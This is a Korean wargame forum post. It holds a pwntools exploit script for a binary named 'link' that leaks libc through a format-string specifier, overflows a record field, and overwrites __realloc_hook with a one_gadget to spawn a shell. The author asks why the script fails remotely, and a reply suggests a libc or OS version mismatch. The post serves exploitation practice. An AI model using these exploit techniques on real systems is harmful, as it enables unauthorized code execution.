로되리안
from pwn import *
# Setup and address-leak stage of the script. Everything here runs against the
# locally spawned binary; the commented-out line is the remote variant.
p = process('./link')
#p = remote('host3.dreamhack.games', 22516)
# Symbol offsets are read from this one libc file (2.27 on the local machine).
# NOTE(review): every address derived below is only meaningful if the process
# on the other end maps this exact libc build — confirm against the target.
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
#context.log_level = 'debug'
libc_start_main_offset = libc.symbols['__libc_start_main']
__realloc_hook_offset = libc.symbols['__realloc_hook']
# Sends a positional pointer format specifier at the first ': ' prompt.
# NOTE(review): presumably the target passes this input to a printf-style call
# as the format string and echoes a stack value back — the target is not shown.
p.sendafter(': ', '%11$p')
# Reads exactly 14 bytes of the reply and parses them as hex, then subtracts 231.
# NOTE(review): 231 is a hard-coded constant; presumably the leaked value is a
# return address 231 bytes into __libc_start_main for this libc build — confirm.
libc_start_main = int(p.recv(14), 16)-231
# Computed libc load base: leaked runtime address minus the file offset.
lb = libc_start_main - libc_start_main_offset
# NOTE(review): 0xe54f7 is a literal offset, not looked up from `libc`; it is
# tied to one libc build and carries no check that it matches the target.
one_gadget = p64(lb + 0xe54f7)
__realloc_hook = lb + __realloc_hook_offset
# NOTE(review): 3486840 is an unexplained magic constant. The result is later
# converted to a decimal string and sent as an object number; its meaning
# depends on the target's memory layout, which is not visible here.
__realloc_hook_ini = __realloc_hook - 3486840
print(one_gadget)
def add_user(object_n, name, phone, etc):
    """Drive menu option 1 of the target to create a record.

    Sends '1' at the menu prompt and ``object_n`` at the object-number prompt
    as newline-terminated lines, then sends ``name``, ``phone`` and ``etc`` at
    their prompts without appending a newline. Talks to the module-level
    tube ``p``.
    """
    p.sendlineafter('menu: ', '1')
    p.sendlineafter('object number: ', object_n)
    # The three field values go out raw: sendafter adds no trailing newline.
    field_inputs = (
        ('name: ', name),
        ('phone number: ', phone),
        ('etc: ', etc),
    )
    for prompt, value in field_inputs:
        p.sendafter(prompt, value)
def edit_user(object_n, new_object_n, game, phone, etc):
    """Drive menu option 4 of the target to edit an existing record.

    Sends '4', ``object_n`` and ``new_object_n`` as newline-terminated lines
    at the menu and object-number prompts, then sends ``game`` (at the
    'new name: ' prompt), ``phone`` and ``etc`` without appending a newline.
    Talks to the module-level tube ``p``.
    """
    line_inputs = (
        ('menu: ', '4'),
        ('object number: ', object_n),
        ('new object number: ', new_object_n),
    )
    for prompt, value in line_inputs:
        p.sendlineafter(prompt, value)

    # Field values are sent raw so their length is exactly what the caller gave.
    field_inputs = (
        ('new name: ', game),
        ('new phone number: ', phone),
        ('new etc: ', etc),
    )
    for prompt, value in field_inputs:
        p.sendafter(prompt, value)
# Main sequence. Statement order matters: each call consumes the prompts the
# target prints, so the steps cannot be reordered.
# Create two records (object numbers '1' and '2') with placeholder fields.
add_user('1','1','1','1')
add_user('2','1','1','1')
# Edit record '1': the `etc` value is 0x100 filler bytes followed by the packed
# __realloc_hook address.
# NOTE(review): presumably this is longer than the target's `etc` buffer and
# spills into adjacent data — the target's record layout is not shown here.
edit_user('1', '1', 'A'*0x10, 'A'*0x10, b'A'*0x100+p64(__realloc_hook))
# Second edit selects a record by the decimal string of __realloc_hook_ini and
# sends the packed one_gadget value as the new name.
# This is the call in the traceback posted on this page: the connection was
# closed (EOFError) before the 'new object number: ' prompt arrived, i.e. the
# target did not reach that prompt for this object number.
# NOTE(review): the technique depends on glibc's __realloc_hook, which was
# removed from glibc in 2.34.
edit_user(str(__realloc_hook_ini),'1', one_gadget,'A','A')
# Select menu option '1' once more, then hand the session to the operator.
p.sendlineafter('menu: ', '1')
p.interactive()
로컬에서는 되는데, 리모트에서는 "Got EOF while reading in interactive"가 아니라 그냥 파이썬 코드 오류로 뜨네요. 뭘 고쳐야 될까요?
#pwnable
답변
2
redticket
File "link.py", line 39, in <module>
edit_user(str(__realloc_hook_ini),'1', one_gadget,'A','A')
File "link.py", line 30, in edit_user
p.sendlineafter('new object number: ', new_object_n)
File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 822, in sendlineafter
res = self.recvuntil(delim, timeout=timeout)
File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 333, in recvuntil
res = self.recv(timeout=self.timeout)
File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 105, in recv
return self._recv(numb, timeout) or b''
File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 183, in _recv
if not self.buffer and not self._fillbuffer(timeout):
File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/tube.py", line 154, in _fillbuffer
data = self.recv_raw(self.buffer.get_fill_size())
File "/usr/local/lib/python3.6/dist-packages/pwnlib/tubes/sock.py", line 56, in recv_raw
raise EOFError
입력을 받아야 할 때 받지 못해서 뜨는 에러 같습니다.
이 경우엔 버전 아니면 라이브러리가 문제인 것 같은데, 버전이 18.04가 맞나요?
wyv3rn
:)